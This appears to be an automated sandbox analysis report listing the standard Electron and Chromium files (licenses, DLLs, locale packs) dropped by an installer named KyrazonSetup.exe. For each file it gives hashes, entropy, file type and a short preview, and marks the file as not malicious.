                                                                                    SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                    SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                    Malicious:false
                                                                                    Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\LICENSES.chromium.html

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:HTML document, ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):9227221
                                                                                    Entropy (8bit):4.785730097444693
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:cpD6826x5kSWSsRinoHnmfm646a6N6z68SH4SApTJ:cHSek
                                                                                    MD5:2675B30D524B6C79B6CEE41AF86FC619
                                                                                    SHA1:407716C1BB83C211BCB51EFBBCB6BF2EF1664E5B
                                                                                    SHA-256:6A717038F81271F62318212F00B1A2173B9CB0CC435F984710AC8355EB409081
                                                                                    SHA-512:3214341DA8BF3347A6874535BB0FF8D059EE604E779491780F2B29172F9963E23ACBE3C534D888F7A3B99274F46D0628962E1E72A5D3FC6F18CA2B62343DF485
                                                                                    Malicious:false
                                                                                    Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title">Credits</span>.<a id="print-link" href="#" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may use, copy, modify this code for any purpose

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\chrome_100_percent.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):135642
                                                                                    Entropy (8bit):7.916363227461705
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:tezwJCGIekwf9W2bg3yhPaL2o418Gb0+VRLf0ld0GY3cQ3ERVm2I:tezw1Iek+42k3yMK18Gb0OV8ld0GecQJ
                                                                                    MD5:A0E681FDD4613E0FFF6FB8BF33A00EF1
                                                                                    SHA1:6789BACFE0B244AB6872BD3ACC1E92030276011E
                                                                                    SHA-256:86F6B8FFA8788603A433D425A4BC3C4031E5D394762FD53257B0D4B1CFB2FFA2
                                                                                    SHA-512:6F6A1A8BFE3D33F3FA5F6134DAC7CD8C017E38E5E2A75A93A958ADDBB17A601C5707D99A2AF67E52C0A3D5206142209703701CD3FAB44E0323A4553CAEE86196
                                                                                    Malicious:false
                                                                                    Preview:....................5...........r..........._.......................P.....J.................c!.....#....#......8.....;.....@....PC.....E.....G....8J....(L....XN.....R.....U..!..Y.."..Z..$..[..&..]..'..^....]_../.we..0..k..1./m..2..m.....n.....o.....q.....t....xw.....z.....~..........,...........................w.........0....{....@....C....y....v.......................................u"...K)....+.../...t3....=...!@...xH...]L....U...5`....pd.....f.....n....Lw....4x.....y.....{.....~....W.....l...........'...........b.......................`............................p................r.....w...0.|...1.<...2.....3.....4.$...5.....6....7.....8.....9.s...:....;.*...<.....=.r...>.`...?.x...@.~...A.8...C.....D.....E.....F.W...G.!...H.....I.....J.....K.....L.....O.....&.....'.....(.5...).....*.*...+.T...,.!...-.k........./.....0.Y...1.....2.....3.....4.....5.....6.!...7.....8.7...9.....:.P...<.....=.-...>.....?.....@.Y...A.....B.{...C.....D.-...E.....F...

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\chrome_200_percent.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):195396
                                                                                    Entropy (8bit):7.94178165609805
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:ADQYaE/N6Mrvy/3JP29W2bg3yhPaafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+y:ADQYaSN6svyd242k3yxgx5GMRejnbdZR
                                                                                    MD5:C37BD7A6B677A37313B7ECC4FF01B6F5
                                                                                    SHA1:79DB970C44347BD3566CEFB6CABD1995E8E173DF
                                                                                    SHA-256:8C1AE81D19FD6323A02EB460E075E2F25ABA322BC7D46F2E6EDB1C4600E6537A
                                                                                    SHA-512:A7B07133FA05593B102A0E5E5788B29488CB74656C5EE25DE897C2BA2B2A7B05C0663ADE74A003F7D6DF2134D0B75F0AD25E15E9C9E0969E9453B7FC40B9F8BB
                                                                                    Malicious:false
                                                                                    Preview:....................<..........................................$.....).....,....N4.....8.....@.....D....;Y.....m.....s....y}.........e...........W...........>.....b.....k...!.%...".}...$.....&.....'........../.#...0.....1.(...2.......$...........9.....-.....2.....q...........d...................................m.........&F...qP...6S....W....a....c...ff....k....v...sx..................~....`....*............F....r............r.....................s...................................*.....E.................W.............................. ....5#....2*....P-....i4.....<....[?.....f.....g....bl..0.Eq..1.sr..2..t..3..u..4.lv..5..w..6.ry..7..z..8.v|..9..~..:.....;.I...<.7...=.....>.....?.....@.....A....C.....D.....E....F.....G.9...H.Z...I.N...J."...K....L.....O.D...&.>...'.....(.....).[...*.....+.<...,.....-.k........./.)...0.}...1.....2.....3.....4.r...5.....6.....7.$...8.....9.U...:.....<.....=.....>.....?.P...@.....A.k...B.,...C.....D.*...E.....F.$.

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\d3dcompiler_47.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4916712
                                                                                    Entropy (8bit):6.398049523846958
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l
                                                                                    MD5:2191E768CC2E19009DAD20DC999135A3
                                                                                    SHA1:F49A46BA0E954E657AAED1C9019A53D194272B6A
                                                                                    SHA-256:7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
                                                                                    SHA-512:5ADCB00162F284C16EC78016D301FC11559DD0A781FFBEFF822DB22EFBED168B11D7E5586EA82388E9503B0C7D3740CF2A08E243877F5319202491C8A641C970
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d...^.}`.........." ......8..........<).......................................K.....:FK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\ffmpeg.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2887680
                                                                                    Entropy (8bit):6.7090688959107
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:9F5qb84KtStWEK/Ju2lf3tAtiLHQVTf6yfcrhCHDXLl8+0LKSQUSCu:9FvSkJXv+tiLAD0+DUS5
                                                                                    MD5:208E7AF956A0803900125BDC11A3ECF2
                                                                                    SHA1:1BD84174194485DA634BF8B3AF0A78E236316A8E
                                                                                    SHA-256:D863C8A26744703F2D12C674B45C87D8B34E21EFCE169D4797B57964D168B077
                                                                                    SHA-512:76937999A21391107D9EBCFD66C7A2CA967CC7CAC7AEB2B15BBECA6B546423A3D5C83969EF151C95D916D5A9F653573CD59D05110566D52A5C2679059C4D4EC3
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........." ......#.........p........................................PB...........`A........................................x)*....../*.(.............@...............B..4....).......................).(....B#.@............3*.P............................text...5.#.......#................. ..`.rdata..$....0#.......#.............@..@.data.........*.."....*.............@....pdata........@.......*.............@..@.00cfg..8.....A.......+.............@..@.gxfg... -....A.......+.............@..@.retplne......A.......+..................tls..........A.......+.............@..._RDATA..\.....B.......+.............@..@.reloc...4....B..4....+.............@..B........................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\icudtl.dat

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):10717392
                                                                                    Entropy (8bit):6.282534560973548
                                                                                    Encrypted:false
                                                                                    SSDEEP:196608:hpgPBhORiuQwCliXUxbblHa93Whli6Z86WOH:n8wkDliXUxbblHa93Whli6Z8I
                                                                                    MD5:E0F1AD85C0933ECCE2E003A2C59AE726
                                                                                    SHA1:A8539FC5A233558EDFA264A34F7AF6187C3F0D4F
                                                                                    SHA-256:F5170AA2B388D23BEBF98784DD488A9BCB741470384A6A9A8D7A2638D768DEFB
                                                                                    SHA-512:714ED5AE44DFA4812081B8DE42401197C235A4FA05206597F4C7B4170DD37E8360CC75D176399B735C9AEC200F5B7D5C81C07B9AB58CBCA8DC08861C6814FB28
                                                                                    Malicious:false
                                                                                    Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html ......E.......E.......E..P/...E.../...E..P7...E...7...E...h...F...h.. F..Pi..0F......DF.....WF.....jF..P...}F.......F..`....F.......F.. ....F.......F..0....F.......G......G......(G.....;G..@...NG......aG.....tG.......G.......G..@....G.......G.......G.......G..P....G.......H.......H..P...2H......EH..`...UH......hH......yH..P....H.......H.......H..`....H.......H.......H..P....I.......I......-I..@...=I......PI......aI..@...uI.......I...0...I.. 1...I..p1...I...e...I...e...I...i...I..`i...J...i..)J...K..BJ..p...^J..."'.uJ..P.'..J....'..J...5'..J..06'..J...>'..J..P?'..K...D'..K...F'.0K...H'.IK...V'.hK....(..K....(..K..P.)..K....)..K..pW*..K..P.*..L...*+.?L..p.+.bL....+..L...U,..L....,..L....,..L....,..L..@.,..M....,.-M..P.-.IM.. e-.`M...e-.~M...R/..M.../..M..0.0..M..@.0..M..P.0..M....0..N....0.!N...,0.9N...,0.NN..0-0.fN...-0.vN...Y0..N...Z0..N..

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libEGL.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):488960
                                                                                    Entropy (8bit):6.346910910503449
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:38hd1BSjuMmof2SEXVVfgV8hxN7h2NwIEOg51f0FticyQ:38DXSjZmof2SEsmN12NwIE7f0FticyQ
                                                                                    MD5:1B74F7E2B5D44AC10A89A5CF206630A8
                                                                                    SHA1:DD2E816E315B6A6A271FB01DC12163D9936C77C4
                                                                                    SHA-256:662746A02930C151C5CAB2B1167A56C6CA78B44028448FDA91182147856EDFED
                                                                                    SHA-512:246814E5FC157CF731E3EC3E1096922864B48A36CC5B1E5259EBD2E673FDE5DC741AD600F69CD80E1544EE12438F7CC6F208ADD894B5E02AC5E2C87D0B3933A8
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........." .....6...:......@........................................ ............`A.........................................E..h....S..(.......x....@..(D..............T....=.......................<..(...@Q..@........... W...............................text....5.......6.................. ..`.rdata......P.......:..............@..@.data....K....... ..................@....pdata..(D...@...F..................@..@.00cfg..8............2..............@..@.gxfg...0&.......(...4..............@..@.retplne.............\...................tls....!............^..............@..._RDATA..\............`..............@..@.rsrc...x............b..............@..@.reloc..T............h..............@..B................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\libGLESv2.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):7617024
                                                                                    Entropy (8bit):6.483264228465234
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:AwY1sQqaLe2Egto8U4r5Pp6TlITQZ38W888888888tb8dii:vNaSgtvroZ8
                                                                                    MD5:596379BA25B32E95B5EC3CD8028B291B
                                                                                    SHA1:AF61B5D29DB91997E29FFED8A410D09CE74EE51E
                                                                                    SHA-256:D5E1D7B8531A0F4AB576BA6F78D4C63B39186A2830D313C6695F0024C9EF627A
                                                                                    SHA-512:F8835B455820C77B4BA509C326A185BF65131242161498229C5E3584A0E7789324932B95678556A657440DEAF067EAD454E85BF8233EFA24162E7E4D9EAF417B
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........." ......X..B.......CL......................................@u...........`A..........................................k......|l.d....Pt.......q..[...........`t......:k.....................`9k.(.....Y.@.............l..... .k.@....................text.....X.......X................. ..`.rdata...T....Y..V....X.............@..@.data...t....pm......Lm.............@....pdata...[....q..\....p.............@..@.00cfg..8.....s......,s.............@..@.gxfg....,....s.......s.............@..@.retplne..... t......\s..................tls....B....0t......^s.............@..._RDATA..\....@t......`s.............@..@.rsrc........Pt......bs.............@..@.reloc.......`t......hs.............@..B................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\af.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):457927
                                                                                    Entropy (8bit):5.4171857958645475
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:/cqYYWk0o+wZiSMKVQ2uM2Z12JynA7PIrfsdgSTCSQ2fs37KQOb5t/tn6A/HiaHU:ynk0ofMSMaTuM2Z12JynA7PIrfsdgST4
                                                                                    MD5:917A688D64ECCF67FEF5A5EB0908B6D4
                                                                                    SHA1:7206B01BBC3FD8CC937DB9050DD8AC86CF44D8CC
                                                                                    SHA-256:6981249837AD767FC030EDC8838878A5E493FB08CC49982CFFAED16CFBEB564D
                                                                                    SHA-512:195DBEC8463CF89990232296C5C927E1501F0C2E01A7BE7C6A6ACAE651853CE1EDB23D639AF65979B39A3C61979119C3A305ACFA3AADF0CB93E241C5E57F4534
                                                                                    Malicious:false
                                                                                    Preview:........_#t.e.....h.$...i.,...j.8...k.G...l.R...n.Z...o._...p.l...q.r...r.~...s.....t.....v.....w.....y.....z.....|.....}.................................................!.....".....#.....(.....5.....D.....U.....h...........V.......................v.................1.......................`.......................Y.......................4.......................(.....v.................7.......................C.......................?.......................J.......................{...........-.....D.............................X.............................S.....r.....{.........../....._.....n...........#.....U.....e.................'.....0.............................J.......................D.......................d.......................D.......................".....h.......................p.................=.....{.......................\.......................T.................6.........................................P.................H.....[.............................x.............

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\am.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):744722
                                                                                    Entropy (8bit):4.880240690992002
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:LMlGLQXTZou76VIx2TERZ3ej5dMNzLY5S9ZSVrBO0Pcx30jH8+F:Lc9XTZsVIxJRZuj5dMNzLY5S9ZSVrBOg
                                                                                    MD5:3CFD7C5BB92AB72C63E003208A9E4529
                                                                                    SHA1:165D2F69AB6A6E237F0FEC943B5577123CEFEA87
                                                                                    SHA-256:12E9E1BEC1C46E5EA706157726E17A4429ACF288A5754FA183BD9B4CF7D3853B
                                                                                    SHA-512:CD7C7837D758EA66ABC871503CDA6FE99FF45990405E60C1133E7C1F4CB29EE69723C9558BB2D3ECCB42948DA57351F4F095062616686AB2E255ACD3C86236F0
                                                                                    Malicious:false
                                                                                    Preview:........s#`.e.D...h.L...i.W...j.c...k.r...l.}...n.....o.....p.....q.....r.....s.....t.....v.....w.....y.....z.....|.....}...................'...../.....7.....>.....E.....L.....M.....N.....S.....o.........................................8.................(.....T.....+...........q...........c...........n...................................q...........6.....L...........n.......................|.........................................L...........:....._.........................................7.....f...........;.....a.................l.................*.............................:.................^...........N.....d.............................}...........O.....n...........r.................~.....,.................N................. .................T.....|.....................................................H.............................*.....p...........J...........,.....U.................r ..... ....W!.....!....l"....."....j#.....$....~$.....$.....%....d%.....%.....%....V&.....&....T'

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\ar.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):813209
                                                                                    Entropy (8bit):4.897933532023867
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:EyBYh5/N/RaWH4gzWvwU5Twikcb5uNi3+D2qeTT:E3aR/5D+M
                                                                                    MD5:3C2AB7363018DB1F20B90ACBC305CB4C
                                                                                    SHA1:60B9CF453178AD0E60FAF20D137A0C7EABDE65C9
                                                                                    SHA-256:3CA47B9C436723F837A53B2904B51EFDF13AB6CAD2F3EF4FE48A1115847ECCBF
                                                                                    SHA-512:589BEB3E95E93F30341933C9B9826210E6BF3E9C1AD8F113D9D8A98FA5A526F81E454EE3357FB55D60D67A4890CE33E964BA2FA810E1771A6B7E82746492313A
                                                                                    Malicious:false
                                                                                    Preview:........4#..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.+...s.<...t.E...v.Z...w.g...y.m...z.|...|.....}...............................................................................B.....t.....^.....L.......................S.................{.....-.................r.....".................7.................(.................E.....\.......................-....................... .................S.............................5.......................,.....3..... .............................7.................u.................E.................'........................................._.....p......................."...........'.....h...................................y...........{...................................~...........%.........................................R.................l.................M.................:...........1.....~.................. ....4!....a!....."....."....."....(#.....#....6$....x$.....$.....$....X%....~%.....%....R&.....&....Y'....{'.....(

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\bg.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):848303
                                                                                    Entropy (8bit):4.65032463396985
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:T3ChsqKaElYMdAs1axUjHh373Zj93aAK5kVDgQwRunpKd2ao57JqueRSnQFwN/6B:TChsqKaElYtUjHh373Z53a1kVDgQw1dn
                                                                                    MD5:A69F6075863D47B564A2FEB655A2946F
                                                                                    SHA1:062232499FF73D39724C05C0DF121ECD252B8A31
                                                                                    SHA-256:A5EB7038ED956BAD7704A722F05691474FF709DFFBAD92B8E31DBB869AD58334
                                                                                    SHA-512:930CE3938AA02A8BCC609A64BD86B7E6164D63BAAD157A980FD079859A6BEE5DB87BD1F7A74A71108F8368BC9C6154BF14A2DBA1ABF269F572BC262614BCF1DB
                                                                                    Malicious:false
                                                                                    Preview:........c#p.e.$...h.,...i.4...j.@...k.O...l.Z...n.b...o.g...p.t...q.z...r.....s.....t.....v.....w.....y.....z.....|.....}...........................................".....).....*.....+.....0.....R.....k.............................-.....q.....5...........U.......................8.....v.....l.....).............................b........... ...................................*.....~.....z.....<.............................>.....t.....<...........Q.....{.....g.....'.............................j..........._.................E...........x.............................f...........C...........3.....a.........................................L.....l...........}.............................f.................o...........I...........z.................{...........;..........._...... ....z ..... .....!....O"....."....8#.....#....j$.....$.....$.....%....D&.....&.....&.....'....T(.....(.....).....).....*....t+.....+.....,....S-.....-................./...../.....0.....0....<1.....1.....1.....2.....3.....4

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\bn.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1094739
                                                                                    Entropy (8bit):4.273606074036768
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:PAUxhq6CLf6bXs8iQ2Zc2EadKZ0ZfQ0/QeIyTtPukkBBbpUDDM5JiXldW:4K46CjYYZ82IypPubBbf5IlI
                                                                                    MD5:D43CE80DDCA3FAB513431FA29BE2E60A
                                                                                    SHA1:3E82282E4ACFEC5F0ACA4672161D2F976F284A0C
                                                                                    SHA-256:87670FF2CEB1EBC38FCE2C3B745AC965F3DE5DE3133D99ED33933A8F3E99D874
                                                                                    SHA-512:1D33CA9BACB91EF328F89A14777A704000BF30FE59AA1CBBBFF34D8BAD266C98D78C9E411E289E834E76EB721DD98934426A565CD5B3436D5A103ABE37F7612A
                                                                                    Malicious:false
                                                                                    Preview:........^#u.e.....h."...i.3...j.?...k.N...l.Y...n.a...o.g...p.t...q.z...r.....s.....t.....v.....w.....y.....z.....|.....}........................................... .....'.........../.....0.....5.....Z...........................................................h.....................................................Q.................?.....w.....,...........1.....T.....{.....Y...........E.....+...................................+.....Z.....'...........9.....n.....i.....S.................A.....9...........3...................................E.................D.................,.................%.....c.....!.................I...................................b.......................$.....u........................ ..... .....!....."....2#....z#.....$.....$.....$.....%.....%.....&.....'....1'.....(.....(.....).....*.....*....L+.....+.....+.....,....^-.....-.....-.........../....L0.....0.....1.....3.....3....14....i5....k6.....7....u7....W8.....9.....9.....9.....:....M;.....;.....;.....<.....=

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\ca.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):515554
                                                                                    Entropy (8bit):5.412339344998089
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:KhBp7kcELygV3z5PAF4N3Mw2juwHzejm0t3lvq8E9oCRaIs3cmlLEY2CJkEydROC:Khh4V8RPS9lMN4MZRg5P56iq
                                                                                    MD5:2D30C5A004715BC8CD54C2E21C5F7953
                                                                                    SHA1:FED917145A03D037A32ABAC6EDC48C76A4035993
                                                                                    SHA-256:D9C45D55A9A5661063B9BBEBB0615DE8F567F3925D04FD10938DA9617C6220E0
                                                                                    SHA-512:B3803551F53D290D8839789F829AFC9C1E12052C81BA20D5E01FB3D2BACD5D1E97BD4C05074322EED17FDEC04C9176C655076FAEC8A3AEF17C39FB999E0C1FCF
                                                                                    Malicious:false
                                                                                    Preview:........e#n.e.(...h.0...i.8...j.D...k.S...l.^...n.f...o.k...p.x...q.~...r.....s.....t.....v.....w.....y.....z.....|.....}...........................................&.....-.........../.....1.....K.....d.................G...........C.....b...........7.....~...........,................./.................*.....G.................).....<................. .....1.................].................}.................X.......................t...................................<.....W...........w.................^.......................J.......................(.....y.................(.......................7.......................$.....s.......................H.....t.................8.....l.....}...........o.................5.......................0.....w.................G.....~.................y.................V.......................9.......................C...............................................&.......................t.......................k.......................d.................&.

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\cs.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):530593
                                                                                    Entropy (8bit):5.852935430786663
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:ljXB+Hdo1ryvJvtQW5EK8VPDNOQ3SCmPs:ljXwHO1uvJ195EK8V5ObCmPs
                                                                                    MD5:06E3FE72FDC73291E8CF6A44EB68B086
                                                                                    SHA1:0BB3B3CF839575B2794D7D781A763751FE70D126
                                                                                    SHA-256:397134D1834F395F1C467A75D84EF2E8545CB0F81E94DBE78B841FBBDAAD802D
                                                                                    SHA-512:211594C30AD4F5CA8813596B59751168C60DFA0D13F24F2AA608FCE82D21C2DE3DE69FE007C4BDE1602DA8AA7EA81EC0F15E173ABC1224362C36B493B425B425
                                                                                    Malicious:false
                                                                                    Preview:........K#..e.....h.....i.....j.....k.....l.*...n.2...o.7...p.D...q.J...r.V...s.g...t.p...v.....w.....y.....z.....|.....}.....................................................................................1.....F...........t.................R...................................W.....p...........U.......................k.......................Z.......................j.................P.................A...........(.....a.....y...........L.........................................P.................-.............................d.......................E.......................4.......................H.......................C.......................8.......................P.......................|...........?.....V.............................g.......................m.......................s...........(....._................. .....4.................G.....\...........6.....w.................}.................[...........,.....M...........0.....Z.....o...........%.....J.....^...........8.....r.

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\da.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):479902
                                                                                    Entropy (8bit):5.456625778597649
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:+luvzrGLXfBlzV0qV5cU3sVEs7a7wlTwUJwa7obRR2vJub51NrXBDUd4JTGqfwI:+HbzszaoQR5rrBTpz
                                                                                    MD5:1939FAA4F66E903EAC58F2564EEB910E
                                                                                    SHA1:BACE65EE6C278D01CCF936E227E403C4DFF2682D
                                                                                    SHA-256:0B9DA7BD6531A7EBE7D8188B320C0953ADCFBAF654037F8265261A12E63D3C87
                                                                                    SHA-512:51588D2FE724E6C407724EA6F46883DED39397AF744EFFAF672F75952A6A734E61E93E59F446080317F2A2B3FA1B45E7405F90FE0B226C44C9F3DD9A4E130A87
                                                                                    Malicious:false
                                                                                    Preview:........j#i.e.2...h.:...i.K...j.W...k.f...l.q...n.y...o.~...p.....q.....r.....s.....t.....v.....w.....y.....z.....|.....}.........................#.....+.....2.....9.....@.....A.....B.....D.....R.....b.....v.................v.................5...................................U.....q...........A.....q.................4.....[.....h.................F.....T.................L.....f...........R.........................................B...................................T.....n.............................U.......................<.............................n.......................f.......................k......................._.......................>.....d.....n...........'.....T.....b...........].......................s.......................P.....n.................-.....J.....Z...........B.....|.................k.......................v.................*.....h.................&...................................3.....b.................^.....p.................$.....1.................*.

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\locales\de.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):512832
                                                                                    Entropy (8bit):5.50981730028679
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:Vsu6moWkxlRnY43K7UpHa63gXya/nOdxIHa3AnO1a265QM5GR6mszMRQI2Cga:VsU4e43K7UpxgCaPoCwM5Vmv2Cga
                                                                                    MD5:2163820CD081FDD711B9230DC9284297
                                                                                    SHA1:C76CC7B440156E3A59CAA17C704D9D327F9F1886
                                                                                    SHA-256:6D787033C94755CC80C187ED8A9DE65808BB4D7968354BBB94B7868AC2E8D205
                                                                                    SHA-512:920FA2A10F7AA7F1F6D911FE2A77EDED0384617D8FD863943AFD99A584DAB3FB2EA3E5D2E20BCA529689A99FDF303912007F2918C62482D8A90194A810F6E535
                                                                                    Malicious:false
